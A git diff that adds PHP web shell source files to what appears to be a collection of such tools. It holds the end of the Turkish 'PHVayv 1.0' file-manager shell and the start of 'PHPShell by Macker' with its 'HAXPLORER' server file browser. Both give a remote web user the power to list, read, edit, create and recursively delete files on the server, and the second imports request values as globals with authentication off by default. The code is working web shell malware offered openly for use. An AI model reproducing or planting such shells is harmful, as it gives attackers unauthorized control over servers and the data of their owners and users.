color="#B7B7B7"> + <span style="font-weight: 700"> + <br> + AventGrup©<br> + </span>Avrasya Veri ve NetWork Teknolojileri Geli‏tirme Grubu<br> + <span style="font-weight: 700"> + <br> + PHVayv 1.0</span></font></td> + <td width="431" bgcolor="#000000" height="76" valign="top"> + <p align="right"><span style="font-weight: 700"> + <font face="Verdana" color="#858585" style="font-size: 2pt"><br> + </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F"> + <a href="http://www.aventgrup.net" style="text-decoration: none"> + <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br> + </font></span><font face="Verdana" style="font-size: 8pt" color="#858585"> + <a href="mailto:shopen@aventgrup.net" style="text-decoration: none"> + <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td> + </tr> + </table> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20"> + <tr> + <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana"> + <span style="font-size: 8pt">&nbsp;اal‎‏‎lan </span></font> + <font face="Verdana" style="font-size: 8pt">Dizin</font></td> + <td bgcolor="#D6D6D6" height="20"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4"> + <tr> + <td width="1"></td> + <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td> + <td width="65"> + &nbsp;</td> + </tr> + </table> + </td> + </tr> +</table> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495"> + <tr> + <td width="100%" bgcolor="#000000" height="19">&nbsp;</td> + </tr> + <tr> + <td width="100%" bgcolor="#9F9F9F" align="center" height="455"> + <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" + <p align="center"><br> + <font + color="#FFFFFF" size="1" face="Arial"> +<input + type="text" size="50" maxlength="32" + name="duzenx2" value="Dosya Ad‎" + class="search" + onblur="if (this.value == '') this.value = 'Kullan‎c‎'" + onfocus="if (this.value == 'Kullan‎c‎') this.value=''" + style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p> +<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> + <textarea name="duzenx" + style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left" + + + rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br> +<br> +</font></b> + <span class="gensmall"> + <input type="submit" size="16" + name="duzenx1" value="Kaydet" + style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center" + </span><br> +&nbsp;</p> +</form> +</td> + </tr> + <tr> + <td width="100%" bgcolor="#000000" align="center" height="19"> + &nbsp;</td> + </tr> + </table> + + + +<? } else { ?> + + + + + +<?if ($duzenle>"") {; +?> + + + + +<body topmargin="0" leftmargin="0"> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59"> + <tr> + <td width="70" bgcolor="#000000" height="76"> + <p align="center"> + <img border="0" src="http://www.aventgrup.net/avlog.gif"></td> + <td width="501" bgcolor="#000000" height="76" valign="top"> + <font face="Verdana" style="font-size: 8pt" color="#B7B7B7"> + <span style="font-weight: 700"> + <br> + AventGrup©<br> + </span>Avrasya Veri ve NetWork Teknolojileri Geli‏tirme Grubu<br> + <span style="font-weight: 700"> + <br> + PHVayv 1.0</span></font></td> + <td width="431" bgcolor="#000000" height="76" valign="top"> + <p align="right"><span style="font-weight: 700"> + <font face="Verdana" color="#858585" style="font-size: 2pt"><br> + </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F"> + <a href="http://www.aventgrup.net" style="text-decoration: none"> + <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br> + </font></span><font face="Verdana" style="font-size: 8pt" color="#858585"> + <a href="mailto:shopen@aventgrup.net" style="text-decoration: none"> + <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td> + </tr> + </table> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1"> + <tr> + <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana"> + <span style="font-size: 8pt">&nbsp;اal‎‏‎lan Dosya</span></font></td> + <td bgcolor="#D6D6D6" height="1"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19"> + <tr> + <td width="1" height="19"></td> + <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td> + </tr> + <tr> + <td width="1" height="1"></td> + </tr> + </table> + </td> + </tr> +</table> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1"> + <tr> + <td width="100%" bgcolor="#000000">&nbsp;</td> + </tr> + <tr> + <td width="100%" bgcolor="#9F9F9F"> + <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos"> +<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> + <br> + <textarea name="duzenx" + style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left" + + + rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r'); +while(! feof ( $baglan ) ){ +$okunan=fgets($baglan,1024); +echo $okunan; +} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br> +<br> +</font></b> + <span class="gensmall"> + <input type="submit" size="16" + name="duzenx1" value="Kaydet" + style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center" + </span></p> +</form> +</td> + </tr> + <tr> + <td width="100%" bgcolor="#000000"> + &nbsp;</td> + </tr> + </table> + + + + + + + + + + + +<? +} else { +?> + + + +<html> + +<head> +<meta http-equiv="Content-Language" content="tr"> +<meta name="GENERATOR" content="Microsoft FrontPage 5.0"> +<meta name="ProgId" content="FrontPage.Editor.Document"> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> +<title>PHVayv 1.0</title> +</head> + +<body topmargin="0" leftmargin="0"> + +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59"> + <tr> + <td width="70" bgcolor="#000000" height="76"> + <p align="center"> + <img border="0" src="http://www.aventgrup.net/avlog.gif"></td> + <td width="501" bgcolor="#000000" height="76" valign="top"> + <font face="Verdana" style="font-size: 8pt" color="#B7B7B7"> + <span style="font-weight: 700"> + <br> + AventGrup©<br> + </span>Avrasya Veri ve NetWork Teknolojileri Geli‏tirme Grubu<br> + <span style="font-weight: 700"> + <br> + PHVayv 1.0</span></font></td> + <td width="431" bgcolor="#000000" height="76" valign="top"> + <p align="right"><span style="font-weight: 700"> + <font face="Verdana" color="#858585" style="font-size: 2pt"><br> + </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F"> + <a href="http://www.aventgrup.net" style="text-decoration: none"> + <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br> + </font></span><font face="Verdana" style="font-size: 8pt" color="#858585"> + <a href="mailto:shopen@aventgrup.net" style="text-decoration: none"> + <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td> + </tr> + </table> + + + + <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20"> + <tr> + <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana"> + <span style="font-size: 8pt">&nbsp;اal‎‏‎lan Klasِr</span></font></td> + <td bgcolor="#D6D6D6" height="20"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4"> + <tr> + <td width="1"></td> + <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td> + <td width="65"> + <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13"> + <tr> + <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13" + onmouseover='this.style.background="D9D9D9"' + onmouseout='this.style.background="9F9F9F"' + style="CURSOR: hand" + + + + + > + <p align="center"><font face="Verdana" style="font-size: 8pt"> + + + + + + + <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none"> + <font color="#000000">ـst Klasِr</font></a></font></td> + + </tr> + </table> + </td> + </tr> + </table> + </td> + </tr> + </table> + + + +<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21"> + <tr> + <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td> + </tr> + <tr> + <td bgcolor="#000000" height="20"> + <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19"> + <tr> + <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26"> + <tr> + <td align="center" bgcolor="#5F5F5F" + onmouseover="style.background='#6F6F6F'" + onmouseout="style.background='#5F5F5F'" + style="CURSOR: hand" + + height="19" bordercolor="#000000"> + <span style="font-weight: 700"> + <font face="Verdana" style="font-size: 8pt" color="#9F9F9F"> + <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td> + </tr> + </table> + </td> + <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27"> + <tr> + <td align="center" bgcolor="#5F5F5F" height="19" + onmouseover="style.background='#6F6F6F'" + onmouseout="style.background='#5F5F5F'" + style="CURSOR: hand" + bordercolor="#000000"> + <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F"> + <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none"> + <font color="#9F9F9F">Yeni Klasِr</font></a></font></td> + </tr> + </table> + </td> + <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28"> + <tr> + <td align="center" bgcolor="#5F5F5F" height="19" + onmouseover="style.background='#6F6F6F'" + onmouseout="style.background='#5F5F5F'" + style="CURSOR: hand" + bordercolor="#000000"> + <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F"> + <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td> + </tr> + </table> + </td> + </tr> + </table> + </td> + </tr> + </table> + + + + + + + +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17"> + <tr> + <td width="30" height="17" bgcolor="#9F9F9F"> + <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td> + <td height="17" bgcolor="#9F9F9F"> + <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya + Ad‎</font></td> + <td width="122" height="17" bgcolor="#9F9F9F"> + <p align="center"> + <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;ف‏lem</font></td> + </tr> +</table> + +<? +if ($sedat=@opendir($dizin)){ +while (($ekinci=readdir ($sedat))){ +if (is_dir("$dizin/$ekinci")){ +?> + +<? if ($ekinci=="." or $ekinci=="..") { +} else { +?> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17"> + <tr> + <td width="30" height="17" bgcolor="#808080"> + <p align="center"> + <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td> + <td height="17" bgcolor="#C4C4C4"> + <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td> + <td width="61" height="17" bgcolor="#C4C4C4" align="center"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20"> + <tr> + <td width="100%" bgcolor="#A3A3A3" + onmouseover="this.style.background='#BBBBBB'" + onmouseout="this.style.background='#A3A3A3'" + style="CURSOR: hand" + height="20"> + + <p align="center"><font face="Verdana" style="font-size: 8pt"> + <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none"> + <font color="#000000">Aç</font></a></font></td> + </tr> + </table> + </td> + <td width="60" height="17" bgcolor="#C4C4C4" align="center"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20"> + <tr> + <td width="100%" bgcolor="#A3A3A3" + onmouseover="this.style.background='#BBBBBB'" + onmouseout="this.style.background='#A3A3A3'" + + + style="CURSOR: hand" + height="20"> + + <p align="center"><font face="Verdana" style="font-size: 8pt"> + <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none"> + <font color="#000000">Sil</font></a> + + </font></td> + </tr> + </table> + </td> + </tr> +</table> +<? +} +?> + +<? +}}} +closedir($sedat); +?> + +<? +if ($sedat=@opendir($dizin)){ +while (($ekinci=readdir ($sedat))){ +if (is_file("$dizin/$ekinci")){ + +?> + +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1"> + <tr> + <td width="30" height="1" bgcolor="#B0B0B0"> + <p align="center"> + <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td> + <td height="1" bgcolor="#EAEAEA"> + <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font> + <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ( XXX )&nbsp;</font></td> + <td width="61" height="1" bgcolor="#D6D6D6" align="center"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20"> + <tr> + <td width="100%" bgcolor="#D6D6D6" + onmouseover="this.style.background='#ACACAC'" + onmouseout="this.style.background='#D6D6D6'" + style="CURSOR: hand" + height="20"> + + <p align="center"><font face="Verdana" style="font-size: 8pt"> + <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>"> + <font color="#000000">Düzenle</font></a></font></td> + </tr> + </table> + </td> + <td width="60" height="1" bgcolor="#D6D6D6" align="center"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%"> + <tr> + <td width="100%" bgcolor="#D6D6D6" no wrap + onmouseover="this.style.background='#ACACAC'" + onmouseout="this.style.background='#D6D6D6'" + style="CURSOR: hand" + height="20"> + + <p align="center"><font face="Verdana" style="font-size: 8pt"> + <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none"> + <font color="#000000">Sil</font></a></font></td> + </tr> + </table> + </td> + </tr> +</table> + +<? +}}} +closedir($sedat); +?> + + + + + +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29"> + <tr> + <td width="100%" bgcolor="#000000">&nbsp;</td> + </tr> +</table> + + <tr> + <td width="100%" bgcolor="#000000"> + </body></html><? } ?><? } ?><? } ?><? } ?> \ No newline at end of file diff --git a/php/PHPshell/PHP Shell/PHP Shell.jpg b/php/PHPshell/PHP Shell/PHP Shell.jpg new file mode 100644 index 0000000..2dd2eeb Binary files /dev/null and b/php/PHPshell/PHP Shell/PHP Shell.jpg differ diff --git a/php/PHPshell/PHP Shell/PHP Shell.php b/php/PHPshell/PHP Shell/PHP Shell.php new file mode 100644 index 0000000..0b1f12b --- /dev/null +++ b/php/PHPshell/PHP Shell/PHP Shell.php @@ -0,0 +1,1010 @@ +<?php + +/* +***************************************************************************************** +* PHPSHELL.PHP BY MACKER August 28th 2003 * +***************************************************************************************** +* * +* Welcome to Macker's PHPShell script... * +* This script will allow you to browse webservers etc... * +* Just copy the file to your directory and open it in your Internet Browser. * +* * +* The webserver should support PHP... * +* * +* You can modify the script if you want, but please send me a copy to: * +* DRAZZ01@HOTMAIL.COM * +***************************************************************************************** + +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! +!! PLEASE NOTE: You should use this script at own risk, it should do damage to the !! +!! Sites or even the server... You are responsible for your own deeds. !! +!! The admin of your webserver should always know you are using this !! +!! script. !! +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! +*/ + + +/*Setting some envirionment variables...*/ + +/* I added this to ensure the script will run correctly... + Please enter the Script's filename in this variable. */ +$SFileName=$PHP_SELF; + +/* uncomment the two following variables if you want to use http + authentication. This will password protect your PHPShell */ +//$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */ +//$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */ + +error_reporting(0); +$PHPVer=phpversion(); +$isGoodver=(intval($PHPVer[0])>=4); +$scriptTitle = "PHPShell"; +$scriptident = "$scriptTitle by Macker"; + +$urlAdd = ""; +$formAdd = ""; + +function walkArray($array){ + while (list($key, $data) = each($array)) + if (is_array($data)) { walkArray($data); } + else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";} +} + +if (isset($_PUT)) walkArray($_PUT); +if (isset($_GET)) walkArray($_GET); +if (isset($_POST)) walkArray($_POST); + + +$pos = strpos($urlAdd, "s=r"); +if (strval($pos) != "") { +$urlAdd= substr($urlAdd, 0, $pos); +} + +$urlAdd .= "&s=r&"; + +if (empty($Pmax)) + $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */ +if (empty($Pidx)) + $Pidx = 0; + +$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); +$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + +$scriptdate = "August 28th 2003"; +$scriptver = "Version 2.6.6dev"; +$LOCAL_IMAGE_DIR = "img"; +$REMOTE_IMAGE_URL = "img"; +$img = array( + "Edit" => "edit.gif", + "Download" => "download.gif", + "Upload" => "upload.gif", + "Delete" => "delete.gif", + "View" => "view.gif", + "Rename" => "rename.gif", + "Move" => "move.gif", + "Copy" => "copy.gif", + "Execute" => "exec.gif" + ); + +while (list($id, $im)=each($img)) + if (file_exists("$LOCAL_IMAGE_DIR/$im")) + $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">"; + else + $img[$id] = "[$id]"; + + + + +/* HTTP AUTHENTICATION */ + + if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) { + setcookie("noauth",""); + Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\""); + Header( "HTTP/1.0 401 Unauthorized"); + echo "Your username or password is incorrect"; + exit ; + + } + +function buildUrl($display, $url) { + global $urlAdd; + $url = $SFileName . "?$urlAdd$url"; + return "<a href=\"$url\">$display</a>"; +} + +function sp($mp) { + for ( $i = 0; $i < $mp; $i++ ) + $ret .= "&nbsp;"; + return $ret; +} + +function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr); } + +function Mydeldir($Fdir) { + if (is_dir($Fdir)) { + $Fh=@opendir($Fdir); + while ($Fbuf = readdir($Fh)) + if (($Fbuf != ".") && ($Fbuf != "..")) + Mydeldir("$Fdir/$Fbuf"); + @closedir($Fh); + return rmdir($Fdir); + } else { + return unlink($Fdir); + } +} + + +function arrval ($array) { +list($key, $data) = $array; +return $data; +} + +function formatsize($insize) { + $size = $insize; + $add = "B"; + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "KB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "MB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "GB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "TB"; + } + return "$size $add"; +} + +if ($cmd != "downl") { + ?> + +<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> --> +<HTML> + <HEAD> + <STYLE> + <!-- + A{ text-decoration:none; color:navy; font-size: 12px } + body { font-size: 12px; + font-family: arial, helvetica; + scrollbar-width: 5; + scrollbar-height: 5; + scrollbar-face-color: white; + scrollbar-shadow-color: silver; + scrollbar-highlight-color: white; + scrollbar-3dlight-color:silver; + scrollbar-darkshadow-color: silver; + scrollbar-track-color: white; + scrollbar-arrow-color: black; + } + Table { font-size: 12px; } + TR{ font-size: 12px; } + TD{ font-size: 12px; + font-family: arial, helvetical; + BORDER-LEFT: black 0px solid; + BORDER-RIGHT: black 0px solid; + BORDER-TOP: black 0px solid; + BORDER-BOTTOM: black 0px solid; + COLOR: black; + } + .border{ BORDER-LEFT: black 1px solid; + BORDER-RIGHT: black 1px solid; + BORDER-TOP: black 1px solid; + BORDER-BOTTOM: black 1px solid; + } + .none { BORDER-LEFT: black 0px solid; + BORDER-RIGHT: black 0px solid; + BORDER-TOP: black 0px solid; + BORDER-BOTTOM: black 0px solid; + } + .inputtext { + background-color: #EFEFEF; + font-family: arial, helvetica; + border: 1px solid #000000; + height: 20; + } + .lighttd { background: #F8F8F8; + } + .darktd { background: #E8E8E8; + } + input { font-family: arial, helvetica; + } + .inputbutton { + background-color: silver; + border: 1px solid #000000; + border-width: 1px; + height: 20; + } + .inputtextarea { + background-color: #EFEFEF; + border: 1px solid #000000; + scrollbar-width: 5; + scrollbar-height: 5; + scrollbar-face-color: #EFEFEF; + scrollbar-shadow-color: silver; + scrollbar-highlight-color: #EFEFEF; + scrollbar-3dlight-color:silver; + scrollbar-darkshadow-color: silver; + scrollbar-track-color: #EFEFEF; + scrollbar-arrow-color: black; + } + .top { BORDER-TOP: black 1px solid; } + .textin { BORDER-LEFT: silver 1px solid; + BORDER-RIGHT: silver 1px solid; + BORDER-TOP: silver 1px solid; + BORDER-BOTTOM: silver 1px solid; + width: 99%; font-size: 12px; font-weight: bold; color: navy; + } + .notop { BORDER-TOP: black 0px solid; } + .bottom { BORDER-BOTTOM: black 1px solid; } + .nobottom { BORDER-BOTTOM: black 0px solid; } + .left { BORDER-LEFT: black 1px solid; } + .noleft { BORDER-LEFT: black 0px solid; } + .right { BORDER-RIGHT: black 1px solid; } + .noright { BORDER-RIGHT: black 0px solid; } + .silver{ BACKGROUND: silver; } + --> + </STYLE> + <TITLE><?php echo $SFileName ?></TITLE> + </HEAD> + <body topmargin="0" leftmargin="0"> + <div style="position: absolute; background: white; z-order:10000; top:0; left:0; width: 100%; height: 100%;"> + <table width=100% height="100%" NOWRAP border="0"> + <tr NOWRAP> + <td width="100%" NOWRAP> + <table NOWRAP width=100% border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="silver border"> + <center> + <strong> + <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> + </strong> + </center> + </td> + </tr> + </table><br> + + <?php +} + +if ( $cmd=="dir" ) { + $h=@opendir($dir); + if ($h == false) { + echo "<br><font color=\"red\">".sp(3)."\n\n\n\n + COULD NOT OPEN THIS DIRECTORY!!!<br>".sp(3)."\n + THE SCRIPT WILL RESULT IN AN ERROR!!! + <br><br>".sp(3)."\n + PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR... + <br><br></font>\n\n\n\n"; + } + if (function_exists('realpath')) { + $partdir = realpath($dir); + } + else { + $partdir = $dir; + } + if (strlen($partdir) >= 100) { + $partdir = substr($partdir, -100); + $pos = strpos($partdir, "/"); + if (strval($pos) != "") { + $partdir = "<-- ...".substr($partdir, $pos); + } + $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir ))); + $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); + $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + } + ?> + <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir"> + <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="silver border"> + <center>&nbsp;HAXPLORER - Server Files Browser...&nbsp;</center> + </td> + </tr> + </table> + <br> + <table width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td class="border nobottom noright"> + &nbsp;Browsing:&nbsp; + </td> + <td width="100%" class="border nobottom noleft"> + <table width="100%" border="0" cellpadding="1" cellspacing="0"> + <tr> + <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td> + <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GO<b></a>&nbsp;<center></td> + </tr> + </table> + + </td> + </tr> + </table> + <!-- </form> --> + <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" > + <tr> + <td width="100%" NOWRAP class="silver border"> + &nbsp;Filename&nbsp; + </td> + <td NOWRAP class="silver border noleft"> + &nbsp;Actions&nbsp;(Attempt to perform)&nbsp; + </td> + <td NOWRAP class="silver border noleft"> + &nbsp;Size&nbsp; + </td> + <td width=1 NOWRAP class="silver border noleft"> + &nbsp;Attributes&nbsp; + </td> + <td NOWRAP class="silver border noleft"> + &nbsp;Modification Date&nbsp; + </td> + <tr> + <?php + + + /* <!-- This whole heap of junk is the sorting section... */ + + $dirn = array(); + $filen = array(); + $filesizes = 0; + while ($buf = readdir($h)) { + if (is_dir("$dir/$buf")) + $dirn[] = $buf; + else + $filen[] = $buf; + } + $dirno = count($dirn) + 1; + $fileno = count($filen) + 1; + + function mycmp($a, $b){ + if ($a == $b) return 0; + return (strtolower($a) < strtolower($b)) ? -1 : 1; + } + + if (function_exists("usort")) { + usort($dirn, "mycmp"); + usort($filen, "mycmp"); + } + else { + sort ($dirn); + sort ($filen); + } + reset ($dirn); + reset ($filen); + if (function_exists('array_merge')) { + $filelist = array_merge ($dirn, $filen); + } + else { + $filelist = $dirn + $filen; + } + + + if ( count($filelist)-1 > $Pmax ) { + $from = $Pidx * $Pmax; + $to = ($Pidx + 1) * $Pmax-1; + if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 ) + $to = count($filelist) - 1; + if ($to > count($filelist)-1) + $to = count($filelist)-1; + $Dcontents = array(); + For ($Fi = $from; $Fi <= $to; $Fi++) { + $Dcontents[] = $filelist[$Fi]; + } + + } + else { + $Dcontents = $filelist; + } + + $tdcolors = array("lighttd", "darktd"); + + while (list ($key, $file) = each ($Dcontents)) { + if (!$tdcolor=arrval(each($tdcolors))) { + reset($tdcolors); + $tdcolor = arrval(each($tdcolors)); } + + if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */ + 